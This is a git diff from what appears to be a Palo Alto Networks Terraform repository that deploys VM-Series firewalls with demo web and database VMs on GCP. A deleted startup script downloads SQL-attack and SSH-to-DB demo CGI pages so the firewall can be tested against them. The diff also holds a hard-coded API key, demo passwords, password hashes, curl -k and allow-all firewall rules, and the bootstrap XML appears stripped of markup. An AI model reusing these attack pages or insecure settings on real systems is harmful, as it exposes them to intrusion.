length(var.fw_names) : "0" }" + name = "${element(var.fw_names, count.index)}" + machine_type = "${var.fw_machine_type}" + zone = "${element(var.fw_zones, count.index)}" + min_cpu_platform = "${var.fw_cpu_platform}" + can_ip_forward = true + allow_stopping_for_update = true + tags = "${var.fw_tags}" + + metadata { + vmseries-bootstrap-gce-storagebucket = "${var.fw_bootstrap_bucket}" + serial-port-enable = true + sshKeys = "${var.fw_ssh_key}" + } + + service_account { + scopes = "${var.fw_scopes}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[0]}" + network_ip = "${element(var.fw_nic0_ip, count.index)}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[1]}" + access_config = {} + network_ip = "${element(var.fw_nic1_ip, count.index)}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[2]}" + access_config = {} + network_ip = "${element(var.fw_nic2_ip, count.index)}" + } + + boot_disk { + initialize_params { + image = "${var.fw_image}" + } + } + + depends_on = [ + "null_resource.dependency_getter", + ] +} + +#************************************************************************************ +# CREATE INSTANCE GROUP +#************************************************************************************ +resource "google_compute_instance_group" "vmseries" { + count = "${(var.create_instance_group && var.enable_ilbnh) ? length(var.fw_names) : 0}" + name = "${element(var.instance_group_names, count.index)}" + zone = "${element(var.fw_zones, count.index)}" + instances = ["${google_compute_instance.vmseries.*.self_link[count.index]}"] +} + +#************************************************************************************ +# OUTPUTS +#************************************************************************************ + +output "fw_names" { + value = "${google_compute_instance.vmseries.*.name}" +} + +output "fw_self_link" { + value = "${google_compute_instance.vmseries.*.self_link}" +} + +output "instance_group" { + value = "${concat(google_compute_instance_group.vmseries.*.self_link, list(""), list(""))}" +} + +output "fw_nic0_public_ip" { + value = "${google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip}" +} + +output "fw_nic1_public_ip" { + value = "${google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip}" +} diff --git a/gcp/gcp-terraform-mclimans/README.md b/gcp/gcp-terraform-mclimans/README.md deleted file mode 100644 index 7b55a4f9..00000000 --- a/gcp/gcp-terraform-mclimans/README.md +++ /dev/null @@ -1 +0,0 @@ -GCP terraform builds by mmclimans@paloaltonetworks.com diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/README.md b/gcp/gcp-terraform-mclimans/demo_deployments/README.md deleted file mode 100644 index 3993db83..00000000 --- a/gcp/gcp-terraform-mclimans/demo_deployments/README.md +++ /dev/null @@ -1 +0,0 @@ -Demo deployments for testing and demonstrations in isolated enviroments. Do not use in any production environments. 
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcloudkey.pub b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcloudkey.pub deleted file mode 100644 index 14ab5c49..00000000 --- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcloudkey.pub +++ /dev/null @@ -1 +0,0 @@ -REPLACE THIS FILE WITH YOUR PUBLIC KEY FOR SSH ACCESS TO BACKEND VMs \ No newline at end of file diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcp-credentials.json b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcp-credentials.json deleted file mode 100644 index b3acf687..00000000 --- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcp-credentials.json +++ /dev/null @@ -1,3 +0,0 @@ -{ - "comment": "REPLACE THIS FILE WITH YOUR GCE API KEY (JSON FORMAT)" -} \ No newline at end of file diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/main.tf b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/main.tf deleted file mode 100644 index 4a522608..00000000 --- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/main.tf +++ /dev/null @@ -1,355 +0,0 @@ -/* -************************************************************************************************************* -** ** -** author: mmclimans ** -** date: 4/1/19 ** -** contact: mmclimans@paloaltonetworks.com ** -** ** -** SUPPORT POLICY ** -** ** -** This build is released under an as-is, best effort, support policy. ** -** These scripts should be seen as community supported and Palo Alto Networks will contribute our ** -** expertise as and when possible. We do not provide technical support or help in using or ** -** troubleshooting the components of the project through our normal support options such as ** -** Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support ** -** options. The underlying product used (the VM-Series firewall) by the scripts or templates are still ** -** supported, but the support is only for the product functionality and not for help in deploying or ** -** using the template or script itself. Unless explicitly tagged, all projects or work posted in our ** -** GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads ** -** page on https://support.paloaltonetworks.com are provided under the best effort policy. 
** -** ** -************************************************************************************************************* -*/ - -# SET AUTHENTICATION TO GCE API -provider "google" { - credentials = "${file(var.gcp_credentials_file)}" - project = "${var.my_gcp_project}" - region = "${var.region}" -} - -############################################################################################ -############################################################################################ -# CREATE BUCKET & UPLOAD VMSERIES BOOTSTRAP FILES -resource "google_storage_bucket" "bootstrap" { - name = "${var.bootstrap_bucket}" - force_destroy = true -} -resource "google_storage_bucket_object" "bootstrap_xml" { - name = "config/bootstrap.xml" - source = "bootstrap/bootstrap.xml" - bucket = "${google_storage_bucket.bootstrap.name}" -} -resource "google_storage_bucket_object" "init-cfg" { - name = "config/init-cfg.txt" - source = "bootstrap/init-cfg.txt" - bucket = "${google_storage_bucket.bootstrap.name}" -} -resource "google_storage_bucket_object" "content" { - name = "content/panupv2-all-contents-8138-5378" - source = "bootstrap/panupv2-all-contents-8138-5378" - bucket = "${google_storage_bucket.bootstrap.name}" -} -resource "google_storage_bucket_object" "software" { - name = "software/" - source = "/dev/null" - bucket = "${google_storage_bucket.bootstrap.name}" -} -resource "google_storage_bucket_object" "license" { - name = "license/" - source = "/dev/null" - bucket = "${google_storage_bucket.bootstrap.name}" -} - - -############################################################################################ -############################################################################################ -# CREATE VPCS AND SUBNETS -resource "google_compute_network" "mgmt" { - name = "${var.mgmt_vpc}" - auto_create_subnetworks = "false" -} -resource "google_compute_subnetwork" "mgmt_subnet" { - name = "${var.mgmt_vpc_subnet}" - ip_cidr_range = "${var.mgmt_vpc_subnet_cidr}" - network = "${google_compute_network.mgmt.name}" - region = "${var.region}" -} -resource "google_compute_network" "untrust" { - name = "${var.untrust_vpc}" - auto_create_subnetworks = "false" -} -resource "google_compute_subnetwork" "untrust_subnet" { - name = "${var.untrust_vpc_subnet}" - ip_cidr_range = "${var.untrust_vpc_subnet_cidr}" - network = "${google_compute_network.untrust.name}" - region = "${var.region}" -} -resource "google_compute_network" "web" { - name = "${var.web_vpc}" - auto_create_subnetworks = "false" -} -resource "google_compute_subnetwork" "web_subnet" { - name = "${var.web_vpc_subnet}" - ip_cidr_range = "${var.web_vpc_subnet_cidr}" - network = "${google_compute_network.web.name}" - region = "${var.region}" -} -resource "google_compute_network" "db" { - name = "${var.db_vpc}" - auto_create_subnetworks = "false" -} -resource "google_compute_subnetwork" "db_subnet" { - name = "${var.db_vpc_subnet}" - ip_cidr_range = "${var.db_vpc_subnet_cidr}" - network = "${google_compute_network.db.name}" - region = "${var.region}" -} - - -############################################################################################ -############################################################################################ -# CREATE GCP VPC ROUTES -resource "google_compute_route" "web_vpc_route" { - name = "web-vpc-route" - dest_range = "0.0.0.0/0" - network = "${google_compute_network.web.name}" - next_hop_ip = "${var.fw_nic2_ip}" - priority = 100 - depends_on = [ - "google_compute_instance.firewall", - 
"google_compute_subnetwork.mgmt_subnet", - "google_compute_subnetwork.untrust_subnet", - "google_compute_subnetwork.web_subnet", - "google_compute_subnetwork.db_subnet", - ] -} -resource "google_compute_route" "db_vpc_route" { - name = "db-vpc-route" - dest_range = "0.0.0.0/0" - network = "${google_compute_network.db.name}" - next_hop_ip = "${var.fw_nic3_ip}" - priority = 100 - depends_on = [ - "google_compute_instance.firewall", - "google_compute_subnetwork.mgmt_subnet", - "google_compute_subnetwork.untrust_subnet", - "google_compute_subnetwork.web_subnet", - "google_compute_subnetwork.db_subnet", - ] -} - - -############################################################################################ -############################################################################################ -# CREATE GCP VPC FIREWALL RULES -resource "google_compute_firewall" "mgmt_vpc_ingress" { - name = "mgmt-ingress" - network = "${google_compute_network.mgmt.name}" - direction = "INGRESS" - source_ranges = ["0.0.0.0/0"] - allow { - protocol = "icmp" - } - allow { - protocol = "tcp" - ports = ["443", "22", "3897"] - } -} -resource "google_compute_firewall" "mgmt_vpc_egress" { - name = "mgmt-vpc-egress" - network = "${google_compute_network.mgmt.name}" - direction = "EGRESS" - destination_ranges = ["0.0.0.0/0"] - allow { - protocol = "all" - } -} -resource "google_compute_firewall" "untrust_vpc_ingress" { - name = "untrust-vpc-ingress" - network = "${google_compute_network.untrust.name}" - direction = "INGRESS" - source_ranges = ["0.0.0.0/0"] - allow { - protocol = "all" - } -} -resource "google_compute_firewall" "untrust_vpc_egress" { - name = "untrust-vpc-egress" - network = "${google_compute_network.untrust.name}" - direction = "EGRESS" - destination_ranges = ["0.0.0.0/0"] - allow { - protocol = "all" - } -} -resource "google_compute_firewall" "web_vpc_ingress" { - name = "web-vpc-ingress" - network = "${google_compute_network.web.name}" - direction = "INGRESS" - source_ranges = ["0.0.0.0/0"] - allow { - protocol = "all" - } -} -resource "google_compute_firewall" "web_vpc_egress" { - name = "web-vpc-egress" - network = "${google_compute_network.web.name}" - direction = "EGRESS" - destination_ranges = ["0.0.0.0/0"] - allow { - protocol = "all" - } -} -resource "google_compute_firewall" "db_vpc_ingress" { - name = "db-vpc-ingress" - network = "${google_compute_network.db.name}" - direction = "INGRESS" - source_ranges = ["0.0.0.0/0"] - allow { - protocol = "all" - } -} -resource "google_compute_firewall" "db_vpc_egress" { - name = "db-vpc-egress" - network = "${google_compute_network.db.name}" - direction = "EGRESS" - destination_ranges = ["0.0.0.0/0"] - allow { - protocol = "all" - } -} - - -############################################################################################ -############################################################################################ -# CREATE VM-SERIES -resource "google_compute_instance" "firewall" { - name = "${var.fw_vm_name}" - machine_type = "${var.fw_machine_type}" - zone = "${var.zone}" - min_cpu_platform = "${var.fw_machine_cpu}" - can_ip_forward = true - allow_stopping_for_update = true - count = 1 - - metadata { - vmseries-bootstrap-gce-storagebucket = "${var.bootstrap_bucket}" - serial-port-enable = true - } - service_account { - scopes = "${var.fw_scopes}" - } - network_interface { - subnetwork = "${google_compute_subnetwork.mgmt_subnet.name}" - network_ip = "${var.fw_nic0_ip}" - access_config = {} - } - network_interface { - subnetwork = 
"${google_compute_subnetwork.untrust_subnet.name}" - network_ip = "${var.fw_nic1_ip}" - access_config = {} - } - network_interface { - subnetwork = "${google_compute_subnetwork.web_subnet.name}" - network_ip = "${var.fw_nic2_ip}" - } - network_interface { - subnetwork = "${google_compute_subnetwork.db_subnet.name}" - network_ip = "${var.fw_nic3_ip}" - } - boot_disk { - initialize_params { - image = "${var.fw_image}" - } - } - depends_on = [ - "google_storage_bucket.bootstrap", - "google_storage_bucket_object.bootstrap_xml", - "google_storage_bucket_object.init-cfg", - "google_storage_bucket_object.content", - "google_storage_bucket_object.license", - "google_storage_bucket_object.software", - ] -} - - -############################################################################################ -############################################################################################ -# CREATE DB SERVER -resource "google_compute_instance" "dbserver" { - name = "${var.db_vm_name}" - machine_type = "${var.db_machine_type}" - zone = "${var.zone}" - can_ip_forward = true - allow_stopping_for_update = true - count = 1 - metadata_startup_script = "${file("${path.module}/scripts/dbserver-startup.sh")}" - metadata { - serial-port-enable = true - sshKeys = "${var.gcp_ssh_user}:${file(var.gcp_key_file)}" - } - network_interface { - subnetwork = "${google_compute_subnetwork.db_subnet.name}" - network_ip = "${var.db_nic0_ip}" - } - service_account { - scopes = "${var.vm_scopes}" - } - boot_disk { - initialize_params { - image = "${var.vm_image}" - } - } - depends_on = [ - "google_compute_instance.firewall", - "google_compute_subnetwork.mgmt_subnet", - "google_compute_subnetwork.untrust_subnet", - "google_compute_subnetwork.web_subnet", - "google_compute_subnetwork.db_subnet", - ] -} - - -############################################################################################ -############################################################################################ -# CREATE WEB SERVER -resource "google_compute_instance" "webserver" { - name = "${var.web_vm_name}" - machine_type = "${var.web_machine_type}" - zone = "${var.zone}" - can_ip_forward = true - allow_stopping_for_update = true - count = 1 - metadata_startup_script = "${file("${path.module}/scripts/webserver-startup.sh")}" - metadata { - serial-port-enable = true - sshKeys = "${var.gcp_ssh_user}:${file(var.gcp_key_file)}" - } - network_interface { - subnetwork = "${google_compute_subnetwork.web_subnet.name}" - network_ip = "${var.web_nic0_ip}" - } - boot_disk { - initialize_params { - image = "${var.vm_image}" - } - } - service_account { - scopes = "${var.vm_scopes}" - } - depends_on = [ - "google_compute_instance.firewall", - "google_compute_subnetwork.mgmt_subnet", - "google_compute_subnetwork.untrust_subnet", - "google_compute_subnetwork.web_subnet", - "google_compute_subnetwork.db_subnet", - ] -} - - -############################################################################################ -############################################################################################ -output "DEPLOYMENT STATUS" { - value = "COMPLETE" -} \ No newline at end of file diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/dbserver-startup.sh b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/dbserver-startup.sh deleted file mode 100644 index f618cd97..00000000 --- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/dbserver-startup.sh +++ /dev/null @@ -1,24 +0,0 @@ -#!/bin/bash -sudo exec > 
>(sudo tee /var/log/user-data.log|logger -t user-data -s 2> sudo /dev/console) 2>&1 -FW_NIC3="10.5.3.4" -while true - do - resp=$(curl -s -S -g -k "https://$FW_NIC3/api/?type=op&cmd=&key=LUFRPT1CU0dMRHIrOWFET0JUNzNaTmRoYmkwdjBkWWM9alUvUjBFTTNEQm93Vmx0OVhFRlNkOXdJNmVwYWk5Zmw4bEs3NjgwMkh5QT0=") - echo $resp - if [[ $resp == *"[CDATA[yes"* ]] ; then - break - fi - sleep 10s - done -sudo apt-get update -sudo apt-get -y install debconf-utils -sudo DEBIAN_FRONTEND=noninteractive | apt-get install -y mysql-server -sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "DELETE FROM mysql.user WHERE User='root' AND Host NOT IN ('localhost', '127.0.0.1', '::1')" -sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "DELETE FROM mysql.user WHERE User=''" -sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "DELETE FROM mysql.db WHERE Db='test' OR Db='test\\_localhost';" -sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "FLUSH PRIVILEGES;" -sudo sed -i "s/.*bind-address.*/bind-address = 0.0.0.0/" /etc/mysql/mysql.conf.d/mysqld.cnf -sudo systemctl restart mysql && sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "CREATE DATABASE Demo;" -sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "CREATE USER 'demouser'@'%' IDENTIFIED BY 'paloalto@123';" -sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "GRANT ALL PRIVILEGES ON Demo.* TO 'demouser'@'%';" -sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "FLUSH PRIVILEGES;" \ No newline at end of file diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/webserver-startup.sh b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/webserver-startup.sh deleted file mode 100644 index 02dd7129..00000000 --- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/webserver-startup.sh +++ /dev/null @@ -1,42 +0,0 @@ -#! 
/bin/bash -exec > >(tee /var/log/user-data.log|logger -t user-data -s 2>/dev/console) 2>&1 -dbip="10.5.3.5" -FW_NIC2="10.5.2.4" -while true - do - resp=$(curl -s -S -g -k "https://$FW_NIC2/api/?type=op&cmd=&key=LUFRPT1CU0dMRHIrOWFET0JUNzNaTmRoYmkwdjBkWWM9alUvUjBFTTNEQm93Vmx0OVhFRlNkOXdJNmVwYWk5Zmw4bEs3NjgwMkh5QT0=") - echo $resp - if [[ $resp == *"[CDATA[yes"* ]] ; then - break - fi - sleep 10s - done -apt-get update -apt-get install -y apache2 wordpress -ln -sf /usr/share/wordpress /var/www/html/wordpress -gzip -d /usr/share/doc/wordpress/examples/setup-mysql.gz -while true; do - resp=$(mysql -udemouser -ppaloalto@123 -h "$dbip" -e 'show databases') - echo "$resp" - if [[ "$resp" = *"Demo"* ]] - then - break - fi - sleep 5s -done -bash /usr/share/doc/wordpress/examples/setup-mysql -n Demo -t "$dbip" "$dbip" -sed -i "s/define('DB_USER'.*/define('DB_USER', 'demouser');/g" /etc/wordpress/config-"$dbip".php -sed -i "s/define('DB_PASSWORD'.*/define('DB_PASSWORD', 'paloalto@123');/g" /etc/wordpress/config-"$dbip".php -wget -O /usr/lib/cgi-bin/guess-sql-root-password.cgi https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/guess-sql-root-password.cgi -chmod +x /usr/lib/cgi-bin/guess-sql-root-password.cgi -sed -i "s/DB-IP-ADDRESS/$dbip/g" /usr/lib/cgi-bin/guess-sql-root-password.cgi -wget -O /usr/lib/cgi-bin/ssh-to-db.cgi https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/ssh-to-db.cgi -chmod +x /usr/lib/cgi-bin/ssh-to-db.cgi -sed -i "s/DB-IP-ADDRESS/$dbip/g" /usr/lib/cgi-bin/ssh-to-db.cgi -wget -O /var/www/html/showheaders.php https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/showheaders.php -wget -O /var/www/html/sql-attack.html https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/sql-attack.html -ln -sf /etc/apache2/conf-available/serve-cgi-bin.conf /etc/apache2/conf-enabled/serve-cgi-bin.conf -ln -sf /etc/apache2/mods-available/cgi.load /etc/apache2/mods-enabled/cgi.load -sudo ln -s /etc/wordpress/config-"$dbip".php /etc/wordpress/config-default.php -systemctl restart apache2 - diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/variables.tf b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/variables.tf deleted file mode 100644 index bb6e19f0..00000000 --- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/variables.tf +++ /dev/null @@ -1,176 +0,0 @@ -/* -************************************************************************************************************* -** ** -** author: mmclimans ** -** date: 4/1/19 ** -** contact: mmclimans@paloaltonetworks.com ** -** ** -** SUPPORT POLICY ** -** ** -** This build is released under an as-is, best effort, support policy. ** -** These scripts should be seen as community supported and Palo Alto Networks will contribute our ** -** expertise as and when possible. We do not provide technical support or help in using or ** -** troubleshooting the components of the project through our normal support options such as ** -** Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support ** -** options. The underlying product used (the VM-Series firewall) by the scripts or templates are still ** -** supported, but the support is only for the product functionality and not for help in deploying or ** -** using the template or script itself. 
Unless explicitly tagged, all projects or work posted in our ** -** GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads ** -** page on https://support.paloaltonetworks.com are provided under the best effort policy. ** -** ** -************************************************************************************************************* -*/ - -variable "my_gcp_project" { - description = "Enter the Project ID of an existing GCP project:" - # default = "my-gcp-project-0000001" -} -variable "gcp_credentials_file" { - description = "Enter the JSON GCE API KEY for your environment (the json must exist in the main.tf directory)" - # default = "gcp-credentials.json" -} -variable "bootstrap_bucket" { - description = "Enter globally unique name for the new bootstrap bucket" - # default = "vmseries-2tier-75834523984575432" -} -variable "gcp_key_file" { - description = "Enter your public key (this is only required if you need to access the DB and WEB VMs):" - # default = "gcloudkey.pub" -} -variable "gcp_ssh_user" { - description = "Enter the username value associated with the GCP public key:" - default = "ubuntu" -} - -variable "fw_image" { - # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-810" - # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-810" - default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-814" -} -variable "region" { - description = "Enter the region to deploy the build:" - default = "us-east4" -} -variable "zone" { - description = "Enter the region's zone:" - default = "us-east4-a" -} - -/* -************************************************************************************************************* -** ** -** THE VARIABLES BELOW DO NOT BE CHANGED TO RUN THE TWO-TIER DEMO!!! 
** -** ** -************************************************************************************************************* -*/ - -############################################################################################################# -# GCP VPC VARIABLES -variable "mgmt_vpc" { - default = "mgmt-vpc" -} -variable "mgmt_vpc_subnet" { - default = "mgmt-subnet" -} -variable "mgmt_vpc_subnet_cidr" { - default = "10.5.0.0/24" -} -variable "untrust_vpc" { - default = "untrust-vpc" -} -variable "untrust_vpc_subnet" { - default = "untrust-subnet" -} -variable "untrust_vpc_subnet_cidr" { - default = "10.5.1.0/24" -} -variable "web_vpc" { - default = "web-vpc" -} -variable "web_vpc_subnet" { - default = "web-subnet" -} -variable "web_vpc_subnet_cidr" { - default = "10.5.2.0/24" -} -variable "db_vpc" { - default = "db-vpc" -} -variable "db_vpc_subnet" { - default = "db-subnet" -} -variable "db_vpc_subnet_cidr" { - default = "10.5.3.0/24" -} -################################################################################################################ -################################################################################################################ -# VM-SERIES VM VARIABLES -variable "fw_vm_name" { - default = "vmseries-vm" -} -variable "fw_machine_type" { - default = "n1-standard-4" -} -variable "fw_machine_cpu" { - default = "Intel Skylake" -} -variable "fw_nic0_ip" { - default = "10.5.0.4" -} -variable "fw_nic1_ip" { - default = "10.5.1.4" -} -variable "fw_nic2_ip" { - default = "10.5.2.4" -} -variable "fw_nic3_ip" { - default = "10.5.3.4" -} -################################################################################################################ -################################################################################################################ -# WEB-VM VARIABLES -variable "web_vm_name" { - default = "web-vm" -} -variable "web_machine_type" { - default = "f1-micro" -} -variable "web_nic0_ip" { - default = "10.5.2.5" -} -################################################################################################################ -################################################################################################################ -# DB-VM VARIABLES -variable "db_vm_name" { - default = "db-vm" -} -variable "db_machine_type" { - default = "f1-micro" -} -variable "db_nic0_ip" { - default = "10.5.3.5" -} -variable "vm_image" { - default = "ubuntu-os-cloud/ubuntu-1804-lts" -} -################################################################################################################ -################################################################################################################ -variable "fw_scopes" { - default = [ - "https://www.googleapis.com/auth/cloud.useraccounts.readonly", - "https://www.googleapis.com/auth/devstorage.read_only", - "https://www.googleapis.com/auth/logging.write", - "https://www.googleapis.com/auth/monitoring.write", - ] -} - -variable "vm_scopes" { - default = ["https://www.googleapis.com/auth/cloud.useraccounts.readonly", - "https://www.googleapis.com/auth/devstorage.read_only", - "https://www.googleapis.com/auth/logging.write", - "https://www.googleapis.com/auth/monitoring.write", - "https://www.googleapis.com/auth/compute.readonly", - ] -} - - diff --git a/gcp/ilbnh-mig/README.md b/gcp/ilbnh-mig/README.md new file mode 100644 index 00000000..e617ff44 --- /dev/null +++ b/gcp/ilbnh-mig/README.md @@ -0,0 +1,76 @@ +## MultiNic ILB Deployment +This is a Terraform version of the manual build described at: 
+https://cloud.google.com/load-balancing/docs/internal/setting-up-ilb-next-hop + +Terraform creates a VM-Series firewall that secures egress and east-west traffic for 2 internal VPCs. Egress traffic from the internal VPCs is routed via an Internal Load Balancer as Next Hop to the VM-Series. The firewall is deployed in a Managed Instance Group to allow automatic failure detection and replacement (sketched after the overview list below). + +### Overview +* 4 x VPCs (testing, management, production, production2) +* 1 x VM-Series (BYOL / Bundle1 / Bundle2) in a Managed Instance Group +* 1 x Ubuntu VM in the testing VPC (installs Apache during creation) +* 1 x Ubuntu VM in the production VPC (installs Apache during creation) +* 1 x GCP Internal Load Balancer in the testing VPC +* 1 x GCP Internal Load Balancer in the production VPC +* 1 x GCP Storage Bucket for VM-Series bootstrapping (a random string is appended to the bucket name for global uniqueness) +
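The Managed Instance Group piece works roughly as follows: an instance template built from the VM-Series image feeds a regional instance group manager whose auto-healing policy recreates a firewall that fails its health check. The block below is a minimal sketch under that assumption, not the contents of this repo's vmseries module; the template fields (`var.fw_image`, `var.mgmt_subnetwork`) and resource names are placeholders, while `hc_ssh_22` refers to the TCP/22 health check defined in fw_common.tf.

```
# Illustrative sketch only; names and variables below are placeholders,
# not this repository's actual vmseries module code.
resource "google_compute_instance_template" "vmseries_sketch" {
  name_prefix    = "vmseries-"
  machine_type   = "n1-standard-4"
  can_ip_forward = true

  disk {
    source_image = var.fw_image # e.g. "${var.fw_image}-${var.fw_panos}" as in fw_common.tf
  }

  # The real template attaches one interface per VPC (mgmt, untrust, trust, ...).
  network_interface {
    subnetwork = var.mgmt_subnetwork
  }

  lifecycle {
    create_before_destroy = true
  }
}

resource "google_compute_region_instance_group_manager" "vmseries_sketch" {
  name               = "vmseries-rigm"
  region             = var.region
  base_instance_name = "vmseries"
  target_size        = 1

  version {
    instance_template = google_compute_instance_template.vmseries_sketch.self_link
  }

  # Recreate the firewall automatically if it fails the TCP health check.
  auto_healing_policies {
    health_check      = google_compute_health_check.hc_ssh_22.self_link
    initial_delay_sec = 600
  }
}
```

In this template the equivalent wiring lives inside `modules/vmseries/` and is consumed in fw_common.tf, which exposes the group as `module.fw_common.vmseries_rigm` for the internal load balancers.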
+

+ +

+ + +### Prerequisites +1. Terraform +2. Access to the GCP Console + +After deployment, the firewalls' username and password are: + * **Username:** paloalto + * **Password:** Pal0Alt0@123 + +### Deployment +1. Download the **ilbnh-mig** repo to the machine running the build +2. In an editor, open **terraform.tfvars** and set values for the following variables (an example follows step 3 below) + +| Variable | Description | +| :------------- | :------------- | +| `project_id` | Project ID for the VM-Series, VM-Series VPCs, GCP storage bucket, & public load balancer. | +| `public_key_path` | Public key used to authenticate to the FW (username: admin) and the Ubuntu VMs (username: demo). | +| `fw_panos` | The license type and PAN-OS version of the firewall image to deploy. | +| `auth_file` | Authentication key file for deployment. | + +3. Download the project authentication key file to the main directory of the Terraform build. +
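For illustration, a completed **terraform.tfvars** for step 2 might look like the sketch below. Every value shown is a placeholder (the variable names come from the table above, and the image flavor follows the `bundle1-904` / `byol-904` convention used elsewhere in this repo); substitute your own project ID, key path, and credentials file name.

```
project_id      = "my-gcp-project-123456"   # placeholder GCP project ID
public_key_path = "~/.ssh/gcp-demo.pub"     # public key pushed to the firewall and Ubuntu VMs
fw_panos        = "bundle1-904"             # VM-Series license flavor + PAN-OS version
auth_file       = "gcp_compute_key.json"    # placeholder service-account key file in the build directory
```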

+ +

+ +4. Execute Terraform +``` +$ terraform init +$ terraform plan +$ terraform apply +``` + +5. After the deployment finishes, navigate to the console and note the public IP address associated with one of the Ubuntu servers (or surface it as an output, as sketched below). + +
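If you would rather not look the address up in the console, the same information can be exposed as a Terraform output. The snippet below is purely a pattern sketch: `module.linux_vm_testing` and its `public_ip` attribute are hypothetical names, since the VM module used by this template may expose a different output (or none at all).

```
# Hypothetical sketch: assumes a "linux_vm_testing" module that exports "public_ip".
output "TESTING-VM-PUBLIC-IP" {
  value = module.linux_vm_testing.public_ip
}
```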

+ +

+ +6. Connect to the server and issue a curl request to its peer. + +

+ +

+ +7. Log in to the firewall and review the traffic logs. +

+ +

+ +8. Destroy the envirnment when done. +``` +$ terraform destroy +``` + +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/gcp/ilbnh-mig/bootstrap_files/authcodes b/gcp/ilbnh-mig/bootstrap_files/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/gcp/ilbnh-mig/bootstrap_files/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/gcp/ilbnh-mig/bootstrap_files/bootstrap.xml b/gcp/ilbnh-mig/bootstrap_files/bootstrap.xml new file mode 100644 index 00000000..a354ec4f --- /dev/null +++ b/gcp/ilbnh-mig/bootstrap_files/bootstrap.xml @@ -0,0 +1,1099 @@ + + + + + + + + yes + + + $1$swuuvbfr$TeXPJ5vj8FQP5E9NiByN40 + + + + + yes + + + $1$kpolrmjb$lJ5t7tCjS7Ghd8tachjOJ. + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDblNZOFdJbktrdGhVZnExdjFoSnlWdHhCSEpTYlRWQnhTTFBwYXg3MGUwRW5sZVZkdGk0VURLUFplREpQMVVxWjNYWjZIblk0L1NzQnhocFFXeW1LenpNYURqVnZ3TWhtcm04ampXYndRYXlqdEk4UVl0SnZNa1RhcHYwT2hWZTBmUUM5VXdTTnFHZ2FTKzVnUGdJRWVPaTB0a01OeU10VjY2bmhCL05ubktqc3RLSnoxYmt5K3RPUnQyeWNvYmdZWVJMdytRdWVLYmpHTkxFSTcrWkp5ak5URm8rUFAyaFZ4Q3hJL2ZzTnpvcTFjNjgyOXVkcmhwOUZsODhqbGNPSFdsYTUrMnRXS0VNVVRrKzY5eXZ3TmhrL3lvZ2F5VUFZZTJROXpEOG9pb2RzVnZSV29VOTk3dmt6TFE3c3FHT0VTYzk5a0xJTzFWaGtGalZHTDExSnogc3R1ZGVudC0wMy0wYWQ5MTllODQ2NmJAcXdpa2xhYnMubmV0 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + 1460 + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + no + + + + + hc-tcp-22 + + + + no + + + + + hc-tcp-22 + + + + no + + + + + hc-tcp-22 + + + + + + + + 3 + 5 + wait-recover + + + + + no + yes + + + + + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + 